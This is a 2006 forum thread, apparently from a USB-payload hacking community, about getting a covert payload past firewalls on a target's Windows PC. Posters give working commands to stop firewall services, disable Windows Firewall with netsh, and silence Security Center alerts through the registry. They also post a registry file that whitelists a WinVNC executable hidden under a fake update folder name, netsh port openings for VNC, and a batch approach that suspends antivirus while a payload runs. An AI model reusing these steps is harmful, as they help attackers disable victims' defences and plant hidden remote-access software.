Shiva Posted November 9, 2006 Posted November 9, 2006 hi, wut if the if a host has a firewall up & running? because the fw will catch it, saying a program is trying to send mail. how does 1 overcome this kinda scenario?? thx in adv Quote
remkow Posted November 9, 2006 Posted November 9, 2006 You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice" Quote
Shiva Posted November 10, 2006 Author Posted November 10, 2006 erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an an account that belongs to the Administrator's grp. Also, if ya kill the FW, especially on boxes with SP2 installed, da Security Centre's msgs's will kick in n start displaying not loaded or some such msg. It may also start Windows own "firewall" if it can b considered a fw at all - lol. Any other thoughts on this? thx in adv Quote
remkow Posted November 10, 2006 Posted November 10, 2006 It's quite easy to disable the security center popups in the registry, and you can also add rules to the windows firewall through the registry. Quote
pseudobreed Posted November 10, 2006 Posted November 10, 2006 erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an an account that belongs to the Administrator's grp. The payload is executed by a local admin account. You dont have to have a username and password, it will use the default profile credentials. Just add "net stop service" at the top of your payload, and then you can "net start service" at the end to put the firewall back to normal. The only issue is if the firewall has a task tray icon (And I dont know many that dont). Once you stop the service, the icon changes to show the status of the firewall. Quote
remkow Posted November 10, 2006 Posted November 10, 2006 It's only gonna be for a few secs, if you'd start it again at the end of the file, so it doesn't really matter Quote
Catcheral Posted November 10, 2006 Posted November 10, 2006 You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice" Do you know the service name for the windows firewall? Quote
remkow Posted November 10, 2006 Posted November 10, 2006 You don't have to disable the windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirew allPolicyStandardProfileAuthorizedApplicationsList] "%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe"="%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe:*:Enabled:WinVnc" "%appdata%NtUninstallKB21050c07160c070f0b0a0a05031b05WinVNC.exe"="%appdata%NtUninstallK21050c07160c070f0b0a0a05031b05WinVNC.exe:*:Enabled:WinVnc" Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg". Quote
Catcheral Posted November 10, 2006 Posted November 10, 2006 What i want to do is just to disable the firewall for a short space of time, not using the switchblade or hacksaw. But im doing somthing else that is blocked by the firewall, and the message is : For your protection windows firewall ahs blocked this operation' or somthing along those lines. And i want to know if there is a way to turn it off, do what i want to do, and turn it back on again, by using a batch file etc. Quote
remkow Posted November 10, 2006 Posted November 10, 2006 I'm not using Windows Firewall myself, but I think that this should disable it: netsh firewall set opmode disable And to prevent the security center from popping up use this registry file: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center] "FirewallDisableNotify"=dword:00000001 Quote
Shiva Posted November 11, 2006 Author Posted November 11, 2006 I'm not using Windows Firewall myself, but I think that this should disable it: netsh firewall set opmode disable kewl thx :D And to prevent the security center from popping up use this registry file: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center] "FirewallDisableNotify"=dword:00000001 thx again :D Quote
Shiva Posted November 11, 2006 Author Posted November 11, 2006 You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice" Do you know the service name for the windows firewall? Just as a side note, if you know the admin pwd of a remote box which has remote registry enabled ( i think its enabled by default ) then u can use PSList from http:www.SysInternals.com to get a list of services running on dat box n snipe em one by 1. Quote
Spartain X Posted November 11, 2006 Posted November 11, 2006 i relly think you are better off using the netsh command then using premade registry entries, because of the chances that the comp does not successfully apply the reg key it could screwed up and the box is FUBAR. also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall process / service and launch the payload and then a call a batch that resumes or starts the process's / services Quote
Catcheral Posted November 12, 2006 Posted November 12, 2006 I'm not using Windows Firewall myself, but I think that this should disable it: netsh firewall set opmode disable And to prevent the security center from popping up use this registry file: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center] "FirewallDisableNotify"=dword:00000001 that worked. Cheers =] Quote
remkow Posted November 12, 2006 Posted November 12, 2006 that worked. Cheers =] No problem m8 i relly think you are better off using the netsh command then using premade registry entries, because of the chances that the comp does not successfully apply the reg key it could screwed up and the box is FUBAR.also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall process / service and launch the payload and then a call a batch that resumes or starts the process's / services Can you post it?? I'm making one too, but I don't have a lot of different av/fws to test it with. Quote
Spartain X Posted November 13, 2006 Posted November 13, 2006 if you follow a similar syntax you should be able to add any port you like netsh firewall add portopening TCP 5900 SMBv1 netsh firewall add portopening TCP 5800 SMBv2 netsh firewall add portopening UDP 5900 RDPv1 netsh firewall add portopening UDP 5800 RDPv2 it's basically "netsh firewall add portopening" and the the protocol then port then the comment. btw this is an example of how to apply it so vnc, btw tvnc does not use udp but i included it as an example Quote
majk Posted November 13, 2006 Posted November 13, 2006 if you follow a similar syntax you should be able to add any port you likenetsh firewall add portopening TCP 5900 SMBv1 netsh firewall add portopening TCP 5800 SMBv2 netsh firewall add portopening UDP 5900 RDPv1 netsh firewall add portopening UDP 5800 RDPv2 it's basically "netsh firewall add portopening" and the the protocol then port then the comment. btw this is an example of how to apply it so vnc, btw tvnc does not use udp but i included it as an example But doesn't that only work with Windows built in firewall? Quote
Spartain X Posted November 14, 2006 Posted November 14, 2006 yes that only for windows firewall for other's you will have to use the registry and even the the AV might intercept it as a virus or trojan trying to tamper with it's firewall Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.